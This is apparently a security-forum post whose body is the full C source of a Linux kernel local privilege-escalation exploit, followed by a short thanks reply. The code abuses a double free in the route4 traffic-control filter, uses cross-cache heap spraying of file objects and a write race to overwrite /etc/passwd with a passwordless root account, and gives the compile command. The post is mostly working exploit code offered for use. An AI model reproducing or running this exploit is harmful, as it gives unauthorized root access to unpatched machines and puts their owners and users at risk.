void delete_tc(int sockfd, uint32_t handle) {
    delete_tc_(sockfd, ((handle) << 8) + (handle));
}
 
// spray spray_count objects ???
int add_tc_basic(int fd, uint32_t handle, void* spray_data, size_t spray_len, int spray_count) {
    assert(spray_len * spray_count < 0x3000);
    char* start = malloc(0x4000);
    memset(start, 0, 0x4000);
    struct nlmsghdr* msg = (struct nlmsghdr*)start;
 
    // new filter                      nlmsghdr + tcmsg
    msg = msg + msg->nlmsg_len;
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; // | flags;
    msg->nlmsg_type = RTM_NEWTFILTER;                               // RTM_NEWTFILTER
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
 
    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;
    // t->tcm_parent = TC_H_ROOT;
 
    addattr_l(msg, 0x4000, TCA_KIND, "basic", 6);
    struct rtattr* tail = addattr_nest(msg, 0x4000, TCA_OPTIONS);
    struct rtattr* ema_tail = addattr_nest(msg, 0x4000, TCA_BASIC_EMATCHES);
    struct tcf_ematch_tree_hdr tree_hdr = { .nmatches = spray_count / 2,
                                           .progid = 0 };
 
    addattr_l(msg, 0x4000, TCA_EMATCH_TREE_HDR, &tree_hdr, sizeof(tree_hdr));
    struct rtattr* rt_match_tail = addattr_nest(msg, 0x4000, TCA_EMATCH_TREE_LIST);
 
    char* data = malloc(0x3000);
    for (int i = 0; i < tree_hdr.nmatches; i++) {
        char* current;
        memset(data, 0, 0x3000);
        struct tcf_ematch_hdr* hdr = (struct tcf_ematch_hdr*)data;
        hdr->kind = TCF_EM_META;
        hdr->flags = TCF_EM_REL_AND;
 
        current = data + sizeof(*hdr);
 
        struct tcf_meta_hdr meta_hdr = {
            .left.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
            .right.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV,
        };
 
        current += addattr(current, TCA_EM_META_HDR, &meta_hdr, sizeof(hdr));
        current += addattr(current, TCA_EM_META_LVALUE, spray_data, spray_len);
        current += addattr(current, TCA_EM_META_RVALUE, spray_data, spray_len);
 
        addattr_l(msg, 0x4000, i + 1, data, current - data);
    }
 
    addattr_nest_end(msg, rt_match_tail);
    addattr_nest_end(msg, ema_tail);
    addattr_nest_end(msg, tail);
 
    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    sendmsg(fd, &msgh, 0);
    free(data);
    free(start);
    return 1;
}
 
void* delete_tc_basic(int sockfd, u_int32_t handle) {
    char* start = malloc(0x4000);
    memset(start, 0, 0x4000);
    struct nlmsghdr* msg = (struct nlmsghdr*)start;
 
    // delete filter
    msg = msg + msg->nlmsg_len;
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO;
    msg->nlmsg_type = RTM_DELTFILTER;                           // RTM_DELTFILTER
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
 
    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;
    // t->tcm_parent = TC_H_ROOT;
 
    addattr_l(msg, 0x1000, TCA_KIND, "basic", 6);
    struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_nest_end(msg, tail);
 
    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
 
    sendmsg(sockfd, &msgh, 0);
    memset(start, 0, 0x4000);
    iov.iov_len = 0x4000;
    iov.iov_base = start;
    recvmsg(sockfd, &msgh, 0);
 
    if (msgh.msg_namelen != sizeof(nladdr))
        printf("[-] size of sender address is wrong\\\\n");
 
    return start;
}
// slow_write() —— thread 1: occupy the write lock (write plenty of data)
void* slow_write() {
    printf("[11-1] start slow write\\\\n");
    clock_t start, end;
    int fd = open("./uaf", 1);
    if (fd < 0) {
        perror("[-] error open uaf file");
        exit(-1);
    }
 
    unsigned long int addr = 0x30000000;
    int offset;
    for (offset = 0; offset < 0x80000 / 20; offset++) {     // mmap space [0x30000000, 0x30000000 + 0x1000 * 0x80000 / 20]
        void* r = mmap((void*)(addr + offset * 0x1000), 0x1000,
            PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
        if (r < 0)
            printf("[-] allocate failed at 0x%x\\\\n", offset);
    }
    assert(offset > 0);
 
    void* mem = (void*)(addr);
    memcpy(mem, "hhhhh", 5);
    struct iovec iov[20];
    for (int i = 0; i < 20; i++) { // write plenty of data (0x80000 * 0x1000 = 0x80 000 000 = 2GB)
        iov[i].iov_base = mem;
        iov[i].iov_len = offset * 0x1000;
    }
 
    run_write = 1;    // notifiy thread 2 (unprivileged `file`) begin to write evil data
    start = clock();
 
    if (writev(fd, iov, 20) < 0)
        perror("slow write");
    end = clock();
    double spent = (double)(end - start) / CLOCKS_PER_SEC;
    printf("[*] write done, spent %f s\\\\n", spent);
    run_write = 0;
}
// write_cmd() —— thread 2: write evil data to the privileged file
void* write_cmd() {
    struct iovec iov = { .iov_base = content, .iov_len = strlen(content) };
 
    while (!run_write) {}  // wait for thread 1 to prepare write
    printf("[11-2] write evil data after the slow write\\\\n");
    run_spray = 1;
    if (writev(overlap_a, &iov, 1) < 0)
        printf("[-] failed to write\\\\n");
}
 
void exploit() {
    char msg[0x10] = {};
    struct rlimit old_lim, lim, new_lim;
 
    // Get old limits
    if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
        printf("Old limits -> soft limit= %ld \\\\t"
            " hard limit= %ld \\\\n",
            old_lim.rlim_cur, old_lim.rlim_max);
    pin_on_cpu(0);
    printf("[*] starting exploit, num of cores: %d\\\\n", cpu_cores);
    // open & setup the socket
    sockfd = socket(PF_NETLINK, SOCK_RAW, 0);
    assert(sockfd != -1);
    add_qdisc(sockfd);
    // 3. allocate a route4_filter (vulnerable object)
    if (read(pipe_child[0], msg, 2) != 2)
        err(1, "[-] read from parent");
    printf("[3] allocate the vulnerable filter\\\\n");
    add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE);  // handle = 0
 
    if (write(pipe_parent[1], "OK", 2) != 2)
        err(1, "[-] write to child");
    // 6. 1st free the route4_filter, return the `kmalloc-256` page to the page allocator
    if (read(pipe_child[0], msg, 2) != 2)
        err(1, "[-] read from parent");
 
    // free the object, to free the slab
    printf("[6] 1st freed the filter object\\\\n");
    // getchar();
    add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE);         // handle = 0
 
    // wait for the vulnerable object being freed
    usleep(500 * 1000);
    if (write(pipe_parent[1], "OK", 2) != 2)
        err(1, "[-] write to child");
    // 8. spray 4000 unprivileged `file`
    if (read(pipe_child[0], msg, 2) != 2)
        err(1, "[-] read from parent");
 
    usleep(1000 * 1000);
    printf("[8] spray 4000 uprivileged `file`\\\\n");
    for (int i = 0; i < spray_num_1; i++) {
        pin_on_cpu(i % cpu_cores);
        fds[i] = open("./data2", 1);
        assert(fds[i] > 0);
    }
    // printf("pause before 2nd free\\\\n");
    // getchar();
  // 9. 2nd free route4_filter, which will free the file
    printf("[9] 2nd free the filter object\\\\n");
    add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE);         // handle = 0
    printf("pause after 2nd free\\\\n");
    // getchar();
    // sleep(10000);
    usleep(1000 * 100);   // should not sleep too long, otherwise file might be claimed by others
 
  // 10. spray 5000 unprivileged `file` & find the overlapped file
    printf("[10] spraying 5000 unprivileged `file`\\\\n");
    for (int i = 0; i < spray_num_2; i++) {
        pin_on_cpu(i % cpu_cores);
        fd_2[i] = open("./uaf", 1);
        assert(fd_2[i] > 0);
        for (int j = 0; j < spray_num_1; j++) {
            // 10-1. spray one `file` & use kcmp to check if we take up the vulnerable object
            if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) == 0)
            {
                printf("[10-1] found overlapped file, id : %d, %d\\\\n", i, j);
                overlap_a = fds[j];
                overlap_b = fd_2[i];
                // 11. start 2 threads: Thread 1-take up write lock; Thread 2-write evil data
                printf("[11] start 2 threads compete to write\\\\n");
                pthread_t pid, pid2;
                pthread_create(&pid, NULL, slow_write, NULL);
                pthread_create(&pid2, NULL, write_cmd, NULL);
 
                while (!run_spray) {}
                // 12. spray privileged `file` object
                close(overlap_a);     // ??????????? why release twice ???????????
                close(overlap_b);
 
                usleep(1000 * 100);
                int spray_num = 4096;
                write(pipe_file_spray[0][1], &spray_num, sizeof(int));
                if (read(pipe_file_spray[1][0], &msg, 2) != 2)
                    err(1, "[-] read from file spray");
                overlapped = true;
            }
        }
        if (overlapped)
            break;
    }
    // 13. finish exploitation
    sleep(3);
    while (run_write) { sleep(1); }
    printf("[13] check whether we overwrite the privileged file\\\\n");
    if (!overlapped) {
        printf("[-] no overlap found :(...\\\\n");
        write(pipe_main[1], "\\\\xff", 1);
    }
    else {
        int xx = open(target, 0);
        char buf[0x100] = {};
        // check if user (hi) in the passwd
        read(xx, buf, 0x30);
        if (!strncmp(buf, "hi", 2))
            write(pipe_main[1], "\\\\x00", 1);
        else {
            printf("[-] not successful : %s\\\\n", buf);
            write(pipe_main[1], "\\\\xff", 1);
        }
    }
    while (1) { sleep(1000); }
}
 
int run_exp() {
    // 0. initialize pipe as notifier
    if (pipe(pipe_parent) == -1)
        err(1, "[-] fail to create pipes\\\\n");
    if (pipe(pipe_child) == -1)
        err(1, "[-] fail to create pipes\\\\n");
    if (pipe(pipe_defrag) == -1)
        err(1, "[-] fail to create pipes\\\\n");
    if (pipe(pipe_file_spray[0]) == -1)   // begin spray file
        err(1, "[-] fail to create pipes\\\\n");
    if (pipe(pipe_file_spray[1]) == -1)   // end spray file
        err(1, "[-] fail to create pipes\\\\n");
    cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);
 
    if (fork() == 0) {
        // 12. Thread 3 - spray 4096*2 priviledged `file` objects to replace unprivileged `file` (wait pipe_file_spray[0])
        adjust_rlimit();
        int spray_num = 0;
        if (read(pipe_file_spray[0][0], &spray_num, sizeof(int)) < sizeof(int))   // use pipe_file_spray to notify
            err(1, "[-] read file spray");
 
        printf("[12] got cmd, start spraying 4096*2 `file` by opening %s\\\\n", target);
        spray_num = 4096;
        if (fork() == 0) {  // spray 4096 `file` (parent-process)
            for (int i = 0; i < spray_num; i++) {
                pin_on_cpu(i % cpu_cores);
                open(target, 0);
            }
            while (1) { sleep(10000); }
        }
        // spray 4096 `file` (sub-process)
        for (int i = 0; i < spray_num; i++) {
            pin_on_cpu(i % cpu_cores);
            open(target, 0);
        }
        printf("[*] spray done\\\\n");
        write(pipe_file_spray[1][1], "OK", 2);  // write pipe_file_spray[1] —— finish spray `file`
        while (1) { sleep(10000); }
        exit(0);
    }
    // 0. preprocess & start main exploit
    if (fork() == 0) {
        pin_on_cpu(0);
        pre_exploit();  // set up process memory / working dir / namespace
        exploit();      // main exploit
    }
    else
    {
        sleep(2);
        if (fork() == 0)
        {
            // 1. defragmentation —— spray 10000 `file` to exhaust all file slabs for cross cache - all cores
            adjust_rlimit();
            printf("[1] defragmentation - spray 10000 `file` to exhaust all file slabs for cross cache\\\\n");
            for (int i = 0; i < 10000; i++) {
                pin_on_cpu(i % cpu_cores);
                open(target, 0);
            }
 
            if (write(pipe_defrag[1], "OK", 2) != 2)
                err(1, "[-] failed write defrag");
            while (1) { sleep(1000); }
        }
        else
        {
            // 2. spray thread - core 0         spray kmalloc-192 & kmalloc-256
            setup_namespace();
            pin_on_cpu(0);
            int sprayfd = socket(PF_NETLINK, SOCK_RAW, 0);
            assert(sprayfd != -1);
            add_qdisc(sprayfd);
            // 2-1. prepare payload
            char msg[0x10] = {};
            char payload[256] = {};
            memset(payload + 0x10, 'A', 256 - 0x10);
 
            if (read(pipe_defrag[0], msg, 2) != 2)
                err(1, "[-] failed read defrag");
 
            // if the exploit keeps failing, please tune the middle and end
            int middle = 38;       // 38
            int end = middle + 40; // 40
      // 2-2. spray (38+3)*32 filters in kmalloc-192 & kmalloc-256
            printf("[2] spray (38+3)*32 kmalloc-192 & kmalloc-256\\\\n");
            for (int i = 0; i < middle; i++)
                add_tc_basic(sprayfd, i + 1, payload, 193, 32);
 
            add_tc_basic(sprayfd, middle + 1, payload, 193, 32);
            add_tc_basic(sprayfd, middle + 2, payload, 193, 32);
            add_tc_basic(sprayfd, middle + 3, payload, 193, 32);
            if (write(pipe_child[1], "OK", 2) != 2)
                err(1, "[-] write to parent\\\\n");
            // 4. spray more filters in kmalloc-192 & kmalloc-256
            if (read(pipe_parent[0], msg, 2) != 2)
                err(1, "[-] read from parent");
            // add_tc_basic(sprayfd, middle+2, payload, 129, 32);
 
            // prepare another part for cross cache
            printf("[4] spray kmalloc-192 & kmalloc-256\\\\n");
            for (int i = middle + 2; i < end; i++)
                add_tc_basic(sprayfd, i + 1, payload, 193, 32);
            // 5. free (end-24)*32 kmalloc-192 & kmalloc-256
            printf("[5] free (end-24)*32 kmalloc-192 & kmalloc-256\\\\n");
            for (int i = 1; i < end - 24; i++) {
                // prevent double free of 192 and being reclaimed by others
                if (i == middle || i == middle + 1)
                    continue;
                delete_tc_basic(sprayfd, i + 1);
            }
            if (write(pipe_child[1], "OK", 2) != 2)
                err(1, "[-] write to parent\\\\n");
            // 7. free (end-middle+1)*32 kmalloc-192 & kmalloc-256
            if (read(pipe_parent[0], msg, 2) != 2)
                err(1, "[-] read from parent");
            // if (cpu_cores == 1) sleep(1);
            printf("[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256\\\\n");
            delete_tc_basic(sprayfd, middle + 2);
            delete_tc_basic(sprayfd, middle + 3);
            delete_tc_basic(sprayfd, 1);
            for (int i = middle + 2; i < end; i++)
                delete_tc_basic(sprayfd, i + 1);
            //getchar();
            if (write(pipe_child[1], "OK", 2) != 2)
                err(1, "[-] write to parent\\\\n");
            while (1) { sleep(1000); }
        }
    }
}
 
int main(int argc, char** argv) {
    global = (char*)mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_SHARED | MAP_ANON, -1, 0);
    memset(global, 0, 0x2000);
 
    self_path = global;
    snprintf(self_path, 0x100, "%s/%s", get_current_dir_name(), argv[0]);
    printf("[*] self path %s\\\\n", self_path);
    // prepare write data —— evil data + existing data in /etc/passwd
    printf("[*] prepare evil data\\\\n");
    int fd = open(target, 0);
    content = (char*)(global + 0x100);
    strcpy(content, overwrite);
    read(fd, content + strlen(overwrite), 0x1000);
    close(fd);
    // run_exp() in sub-process
    assert(pipe(pipe_main) == 0);
    if (fork() == 0) {
        run_exp();                  // main exploit
        while (1) { sleep(10000); }
    }
    // judge if succeed
    char data;
    read(pipe_main[0], &data, 1);
    if (data == 0)
        printf("[+] succeed\\\\n");
    else
        printf("[-] failed\\\\n");
}
// $ gcc -static -pthread -O0 ./exploit.c -o ./exploit
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mount.h>
#include <sys/msg.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
 
#include <sys/shm.h>
#include <sys/stat.h>
#include <sys/timerfd.h>
 
#include <linux/tc_ematch/tc_em_meta.h>
#include <sys/resource.h>
 
#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/kcmp.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/pkt_cls.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>
 
#include <x86intrin.h>
#include <err.h>
#include <fcntl.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/utsname.h>
 
char* target = "/etc/passwd";                   // overwrite the target file
char* overwrite = "hi:x:0:0:root:/:/bin/sh\\\\n"// "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash\\\\n"
char* global;
char* self_path;
char* content;                                  // evil data + existing data in the target file
 
#define PAGE_SIZE 0x1000
#define MAX_FILE_NUM 0x8000
 
int fds[MAX_FILE_NUM] = {};
int fd_2[MAX_FILE_NUM] = {};
int overlap_a = -1;     // unprivileged `file`
int overlap_b = -1;     // privileged `file`
 
int cpu_cores = 0;      // num of cpu cores
int sockfd = -1;
 
int spray_num_1 = 2000; // 4000
int spray_num_2 = 4000; // 5000
 
int pipe_main[2];       // notify process to excecute using pipe
int pipe_parent[2];
int pipe_child[2];
int pipe_defrag[2];
int pipe_file_spray[2][2];
 
int run_write = 0;      // let thread 2 begin to write evil data
int run_spray = 0;      // let thread 3 begin to spray privileged `file`
bool overlapped = false;
 
void print_hex(char* buf, int size) {
    int i;
    puts("======================================");
    printf("data :\\\\n");
    for (i = 0; i < (size / 8); i++) {
        if (i % 2 == 0) {
            printf("%d", i / 2);
        }
        printf(" %16llx", *(size_t*)(buf + i * 8));
        if (i % 2 == 1) {
            printf("\\\\n");
        }
    }
    puts("======================================");
}
// set cpu affinity
void pin_on_cpu(int cpu) {
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(cpu, &cpu_set);
    if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) {
        perror("sched_setaffinity()");
        exit(EXIT_FAILURE);
    }
}
 
static bool write_file(const char* file, const char* what, ...) {
    char buf[1024];
    va_list args;
    va_start(args, what);
    vsnprintf(buf, sizeof(buf), what, args);
    va_end(args);
    buf[sizeof(buf) - 1] = 0;
    int len = strlen(buf);
    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;
    if (write(fd, buf, len) != len) {
        int err = errno;
        close(fd);
        errno = err;
        return false;
    }
    close(fd);
    return true;
}
// setup working dir
static void use_temporary_dir(void) {
    system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
    system("touch exp_dir/data2");
    char* tmpdir = "exp_dir";
    if (!tmpdir)
        exit(1);
    if (chmod(tmpdir, 0777))
        exit(1);
    if (chdir(tmpdir))
        exit(1);
    symlink("./data", "./uaf");
}
// setup process memory
static void adjust_rlimit() {
    struct rlimit rlim;
    rlim.rlim_cur = rlim.rlim_max = (200 << 20);
    setrlimit(RLIMIT_AS, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 32 << 20;
    setrlimit(RLIMIT_MEMLOCK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 136 << 20;
    // setrlimit(RLIMIT_FSIZE, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 1 << 20;
    setrlimit(RLIMIT_STACK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 0;
    setrlimit(RLIMIT_CORE, &rlim);
    // RLIMIT_FILE
    rlim.rlim_cur = rlim.rlim_max = 14096;
    if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {  // RLIMIT_NOFILE 最大打开文件描述符限制,默认为 1024, 需设置为 14096, 便于喷射 `file` 结构
        rlim.rlim_cur = rlim.rlim_max = 4096;
        spray_num_1 = 1200;
        spray_num_2 = 2800;
        if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {
            perror("[-] setrlimit");
            err(1, "[-] setrlimit");
        }
    }
}
 
void setup_namespace() {
    int real_uid = getuid();
    int real_gid = getgid();
 
    if (unshare(CLONE_NEWUSER) != 0) {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }
 
    if (unshare(CLONE_NEWNET) != 0) {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }
 
    if (!write_file("/proc/self/setgroups", "deny")) {
        perror("[-] write_file(/proc/self/set_groups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\\\\n", real_uid)) {
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\\\\n", real_gid)) {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }
}
 
// set up process memory / working dir / namespace
void pre_exploit() {
    adjust_rlimit();
    use_temporary_dir();
    setup_namespace();
}
 
#define NLMSG_TAIL(nmsg)                                                       \\\\
  ((struct rtattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
// add attribute
int addattr(char* attr, int type, void* data, int len) {
    struct rtattr* rta = (struct rtattr*)attr;
 
    rta->rta_type = type;
    rta->rta_len = RTA_LENGTH(len);
    if (len)
        memcpy(RTA_DATA(attr), data, len);
 
    return RTA_LENGTH(len);
}
// add attribute (maxlen limitation)
int addattr_l(struct nlmsghdr* n, int maxlen, int type, const void* data, int alen) {
    int len = RTA_LENGTH(alen);
    struct rtattr* rta;
 
    if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
        fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\\\\n", maxlen);
        return -1;
    }
    rta = NLMSG_TAIL(n);
    rta->rta_type = type;
    rta->rta_len = len;
    if (alen)
        memcpy(RTA_DATA(rta), data, alen);
    n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
    return 0;
}
 
struct rtattr* addattr_nest(struct nlmsghdr* n, int maxlen, int type) {
    struct rtattr* nest = NLMSG_TAIL(n);
 
    addattr_l(n, maxlen, type, NULL, 0);
    return nest;
}
 
int addattr_nest_end(struct nlmsghdr* n, struct rtattr* nest) {
    nest->rta_len = (void*)NLMSG_TAIL(n) - (void*)nest;
    return n->nlmsg_len;
}
// add_qdisc() —— setup the socket
int add_qdisc(int fd) {
    char* start = malloc(0x1000);
    memset(start, 0, 0x1000);
    struct nlmsghdr* msg = (struct nlmsghdr*)start;
 
    // new qdisc                                          nlmsghdr + tcmsg
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWQDISC;
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
    // set local
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_parent = TC_H_ROOT;
    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
 
    addattr_l(msg, 0x1000, TCA_KIND, "sfq", 4);       // sfq is not defaully configured, only qfq is configured
    // print_hex(msg, msg->nlmsg_len);
 
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    return sendmsg(fd, &msgh, 0);
}
// spray 1 vulnerable object (filter) with customized flags
int add_tc_(int fd, u_int32_t from, u_int32_t to, u_int32_t handle, u_int16_t flags) {
    char* start = malloc(0x2000);
    memset(start, 0, 0x2000);
    struct nlmsghdr* msg = (struct nlmsghdr*)start;
 
    // new filter
    msg = msg + msg->nlmsg_len;
    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | flags;
    msg->nlmsg_type = RTM_NEWTFILTER;                               // RTM_NEWTFILTER
    struct tcmsg* t = (struct tcmsg*)(start + sizeof(struct nlmsghdr));
 
    // prio, protocol
    u_int32_t prio = 1;
    u_int32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);
    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_handle = handle;
 
    addattr_l(msg, 0x1000, TCA_KIND, "route", 6);
    struct rtattr* tail = addattr_nest(msg, 0x1000, TCA_OPTIONS);
    addattr_l(msg, 0x1000, TCA_ROUTE4_FROM, &from, 4);              // TCA_ROUTE4_FROM
    addattr_l(msg, 0x1000, TCA_ROUTE4_TO, &to, 4);                  // TCA_ROUTE4_TO
    addattr_nest_end(msg, tail);
 
    // packing
    struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len };
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
 
    sendmsg(fd, &msgh, 0);
    free(start);
    return 1;
}
 
void add_tc(int sockfd, uint32_t handle, uint16_t flag) {
    add_tc_(sockfd, 0, handle, (handle << 8) + handle, flag);
}
 
uint32_t calc_handle(uint32_t from, uint32_t to) {
    uint32_t handle = to;
 
    assert(from <= 0xff && to <= 0xff);
    handle |= from << 16;
 
    if (((handle & 0x7f00) | handle) != handle)
        return 0;
 
    if (handle == 0 || (handle & 0x8000))
        return 0;
    return handle;
}
 

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2024-3-21 18:55 被Arahat0编辑 ,原因:
收藏
免费 12
支持
分享
最新回复 (1)
雪    币: 3070
活跃值: (30876)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
感谢分享
2024-3-2 23:23
1
游客
登录 | 注册 方可回帖
返回
//